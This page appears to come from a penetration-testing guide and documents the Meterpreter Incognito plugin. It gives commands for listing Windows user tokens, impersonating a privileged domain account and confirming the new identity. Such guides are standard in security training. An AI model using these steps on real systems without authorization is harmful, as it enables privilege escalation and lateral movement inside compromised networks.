Incognito

Incognito - Meterpreter Plugin

The Incognito plugin in Meterpreter is a post-exploitation tool that allows attackers to manipulate Windows tokens for privilege escalation and lateral movement. It enables token enumeration, impersonation, and delegation, making it useful for maintaining access within a compromised system.

Incognito is particularly effective against Windows environments using token-based authentication, such as Active Directory networks.

Key Features of Incognito

List available tokens on a compromised system
Impersonate privileged users (e.g., Administrator, SYSTEM)
Escalate privileges using stolen tokens
Bypass access controls by inheriting user permissions

Load the Incognito plugin:
```
load incognito
```
List available user tokens:
```
list_tokens -u
```
Displays user tokens that can be impersonated.
Impersonate a privileged token:
```
impersonate_token DOMAIN\\USER
```
- Grants Administrator-level access by impersonating the token.
Verify the new user identity:
```
getuid
```
- Confirms if the session is now running as the impersonated user.

PreviousKiwi NextUtils

Last updated 5 months ago